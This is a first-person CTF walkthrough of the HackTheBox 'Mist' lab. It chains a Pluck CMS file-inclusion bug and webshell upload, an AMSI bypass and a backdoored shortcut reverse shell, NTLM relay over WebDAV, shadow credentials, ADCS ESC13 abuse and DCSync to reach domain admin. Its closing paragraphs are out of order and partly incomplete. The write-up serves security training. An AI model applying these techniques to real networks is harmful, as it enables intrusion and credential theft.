Mist is an Insane-difficulty machine that provides a comprehensive scenario for exploiting various misconfigurations and vulnerabilities in an Active Directory (AD) environment. The machine has multiple layers, starting with a public-facing CMS running on Apache with a path traversal vulnerability, allowing us to retrieve a backup file containing hashed credentials. Cracking this hash grants initial access as a low-privileged web user. Exploiting file-write permissions on a shared directory further elevates our access by allowing a reverse shell connection as another domain user. From there, enumeration reveals several AD misconfigurations, including LDAP signing disabled, WebDAV exploitation, and misconfigurations in ADCS templates, each step designed to escalate privileges through different AD entities. The final exploit involves creating shadow credentials to acquire the machine account’s NTLM hash, enabling a DCSync attack to obtain the Domain Administrator hash.
Enumeration
Nmap Scan
nmap -p- --min-rate 10000 $ip -Pn -oN Nmap/10000-port-scan
PORT STATE SERVICE
80/tcp open http
nmap -sCV -p80 $ip -Pn -oN Nmap/Script-scan
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.52 ((Win64) OpenSSL/1.1.1m PHP/8.1.1)
HTTP
http://10.10.11.17?file=mist
When clicking admin word, I was redirected to this login page
The version of pluck is 4.7.18. A quick search of the version in exploit-db the site leads to this CVE, but I don't have the admin password yet.
After deep searching for other pluck CVEs, I found unauthenticated LFI
Vulnerability Details
When I included admin_backup.php, I got a hash, so I will try to crack it
On https://crackstation.net/, I was able to crack it
Initial Access
When I used the cracked password to log in as admin, I was redirected to the admin portal
Now with the admin password, I can get RCE via the CVE we found before
I read the exploit and decided to perform it manually rather than using the poc.
First, Go to http://10.10.11.17/admin.php?action=installmodule
zip module.zip p0wny.php
Finally, access the webshell at http://10.10.11.17/data/modules/module/p0wny.php
Lateral Movement
Looking for internal ports, there are RPC, SMB, and WinRM. That confirms there is firewall rules that prevent most inbound connections to MS01
I want to find possible escalation path on ms01, so I uploaded winpeas.ps1 and PowerUp.ps1 to the box but since AV is enabled, I had to bypass AMSI first.
I created a bypass.ps1 containing common AMSI bypass (patching amsiScanBuffer), Then load the PowerUp.ps1 script
Unfortunately, I didn't find any exploitation path with PowerUp tool but under C:\ There is an uncommon folder
JokerShell C:\> ls
Mode LastWriteTime Length Name
---- ------------- ------ ----
d----- 3/10/2024 1:50 AM Common Applications
d----- 5/8/2021 1:20 AM PerfLogs
d-r--- 2/20/2024 5:44 AM Program Files
d----- 5/8/2021 2:40 AM Program Files (x86)
d-r--- 2/21/2024 12:37 PM Users
d----- 3/26/2024 12:02 PM Windows
d----- 3/10/2024 3:21 AM xampp
JokerShell C:\Common Applications> dir
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 5/8/2021 1:15 AM 1118 Calculator.lnk
-a---- 5/7/2021 3:14 PM 1175 Notepad.lnk
-a---- 5/7/2021 3:15 PM 1171 Wordpad.lnk
They are .lnk files to execute common programs on the system.
JokerShell C:\Common Applications> type Calculator.lnk
L?F?)@%SystemRoot%\system32\shell32.dll,-22531%windir%\system32\win32calc.exef ?-1SPS??XF?L8C???&?m?-1SPSU(L?y?9K????-????%windir%\system32\win32calc.exe%windir%\system32\win32calc.exe
What if I can overwrite one of them and add a path to execute a reverse shell when one uses it??. First, I need to check my permission over this folder
JokerShell C:\> icacls 'Common Applications'
Common Applications NT AUTHORITY\SYSTEM:(OI)(CI)(F)
MS01\Administrator:(OI)(CI)(F)
BUILTIN\Administrators:(OI)(CI)(F)
BUILTIN\Users:(OI)(CI)(RX,W)
From the output above, The BUILTIN\Users has write access on the folder(RX,W).
On my Windows host, I create a new shortcut
On the target field, I put this payload, and inside rev.ps1 It is an encoded reverse shell
Make sure you're in C:\xampp\htdocs because it's excluded from defender
After pivoting, I can run Nmap and see the results:
nmap -iL ip.txt -F -Pn
Nmap scan report for 192.168.100.100
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
Nmap scan report for 192.168.100.101
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
443/tcp open https
445/tcp open microsoft-ds
Looking for Remote management ports, I found WinRM is running on the two hosts
nmap -iL ip.txt -p5985,3389,5986 --open
Nmap scan report for 192.168.100.100
PORT STATE SERVICE
5985/tcp open wsman
Nmap scan report for 192.168.100.101
PORT STATE SERVICE
5985/tcp open wsman
Script scan for the DC
nmap -sCV -p53,88,135,139,389,445,5985 192.168.100.100 -oN Nmap/dc-scan
Nmap scan report for 192.168.100.100
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-08 20:46:19Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: mist.htb0., Site: Default-First-Site-Name)
| Subject Alternative Name: DNS:DC01.mist.htb
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
I will add the two machines to my /etc/hosts file
echo '192.168.100.100 dc01 dc01.mist.htb mist.htb' | sudo tee -a /etc/hosts
echo '192.168.100.101 ms01 ms01.mist.htb' | sudo tee -a /etc/hosts
My next move is to enumerate both the shared folders and the domain acls With Bloodhound, so I will upload SharpHound.exe to the host and begin the collection
I still couldn't access shared folders with no credentials
I already know what to do, So I will proceed directly with these steps:
check if webdav is running
If webdav is not running, try to enable it
Using any coercion method (printerbug, PetitPotam, coercer, etc) to force the machine to authenticate to my host
Set up a relay agent on my host to relay the authentication coming from HTTP (WebDav) to LDAP and perform RBCD or Shadow Credential Attack
Performing RBCD depending on having account with SPN or ability to create a machine account, but Shadow Credentials depends on PKINIT authentication (usually when ADCS is installed)
When I enumerated the domain to see if I can add computer account or not, I found the value of ms-ds-machineaccountquota zero, So I can't do it.
When I enumerated the domain to see if I can add computer account or not, I found msds-keycredentiallink contains a value, So Shadow Credential attack is possible.
Now, Let's deal with WebDav, I downloaded SharpWebClientScanner.exe to query the its status but I didn't find it to be running on any host, So I have to enable it manually.
JokerShell C:\xampp\htdocs> .\SharpWebClientScanner.exe --domain mist.htb
??????????????????????????????????????????????????????????????????????????????????????????
??????????????????????????????????????????????????????????????????????????????????????????
??????????????????????????????????????????????????????????????????????????????????????????
By Mor David
[x] Unable to reach DAV pipe on MS01, system is either unreachable or does not have WebClient service running
[x] Unable to reach DAV pipe on DC01, system is either unreachable or does not have WebClient service running
[x] Unable to reach DAV pipe on svc_ca, system is either unreachable or does not have WebClient service running
JokerShell C:\xampp\htdocs> .\EtwStartWebClient.exe
[+] WebClient Service started successfully
Now, I need to use the coerce method, but I need credentials for it. I only have a shell with a domain user brandon.keywarp But with no password or hash.
There is one way to get the hash of the user using ADCS templates to request a certificate for the user and get their NT hash from it.
With Certipy, I can authenticate to the domain and get the hash
certipy-ad auth -pfx cert.pfx -domain mist.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: brandon.keywarp@mist.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'brandon.keywarp.ccache'
[*] Trying to retrieve NT hash for 'brandon.keywarp'
[*] Got hash for 'brandon.keywarp@mist.htb': aad3b435b51404eeaad3b435b51404ee:db03d6a77a2205bc1xxxxxxxxxxx
For WebDav to function, It needs the hostname to connect to, but my host isn't accessible from the internal network, so I will add a port forwarding rule so that any connection that comes to ms01 . 8888 is forwarded to me at 80
[Agent : MIST\Brandon.Keywarp@MS01] » listener_add --addr 0.0.0.0:8888 --to 0.0.0.0:80 --tcp
INFO[8701] Listener 0 created on remote agent!
cert -export -pfx /home/kali/vault/Hacking/Mist/impacket/e1LybMof.pfx -password 'y5hd2VIzZgXcGREYy0uJ' -out cert.pfx
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Writing PFX to 'cert.pfx'
Authenticate to the DC using the certificate and get NT hash of the computer account.
certipy-ad auth -pfx cert.pfx -domain mist.htb -username 'MS01$' -dc-ip 192.168.100.100
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[!] Could not find identification in the provided certificate
[*] Using principal: ms01$@mist.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ms01.ccache'
[*] Trying to retrieve NT hash for 'ms01$'
[*] Got hash for 'ms01$@mist.htb': aad3b435b51404eeaad3b435b51404ee:17749fa7409ac85c4zzzzzzzzzzzz
With the computer account hash, I can create a Silver ticket to access the file system as an administrator
The file .kdbx is certainly keepass password manager, So it will be protected by a password.
Cats.png has nothing rather than cats images
image_200222024.png has something interesting:
A string that's been partially hidden and encoded using base64
UA7cpa[#1!_*ZX
I will attempt it against keepass hash to crack it but I think I will need to do a brute force attack using hashcat. First, get the hash of keepass the database
keepass2john sharon.kdbx > keepass.hash
The input in the image was 15 chars and the string I have is 14 chars, So I can only append one ?a , which means all possible chars in hashcat
SVC_CA$ can add KeyCredentialLink (Shadow Credential) to svc_cabackup
certipy-ad shadow auto -u 'svc_ca$@mist.htb' -hashes :09814d63c9baxxxxxxxxxxxx-account svc_cabackup
ESC13: If a principal (user or computer) has enrollment rights on a certificate template configured with an issuance policy that has an OID group link, then this principal can enroll a certificate that allows obtaining access to the environment as a member of the group specified in the OID group link.
From bloodhounoI can see that being a member of Certificate Services group, I can abuse ESC13 and add myself or anyone I want to Certificate Managers group
Certificate Managers group is a member of CA Backup group
CA Backup A group's member can perform ESC13, too, and get a membership in Services acountsthe group that is a member of Backup Operators group.
To summarize the attack path:
Perform ESC13 to inherit the privileges of Certificate Managers group
Perform ESC13 inherit the privileges of Services acounts group
Inherit Backup Operators privileges being in Services acounts group
Request a certificate for the vulnerable template managerauthentication
Following this , I have to look under /data/settings/modules/albums folder, and I found admin_backup.php
Second, create a zip file containing php a shell. I will use and upload it
I will upgrade my shell with to get more flexibility because the installed modules don't persist. Maybe there is a script in the background removing them.
At this point, with a domain user, I have to pivot to enumerate the domain controller with
I didn't find anything that can be useful till now, So there is an attack I have to try (NTLM Relay over LDAP using WebDav) And this post is useful for performing the attacks:
I will use this to enable it from Windows
First, Upload to the machine and request a certificate for the current user
Since we found before that MS01$ has keyCredentialLink value, we need a tool to clear it and add a new one, and this is included in this version of ntlmrelayx.py After adding a new feature in this .
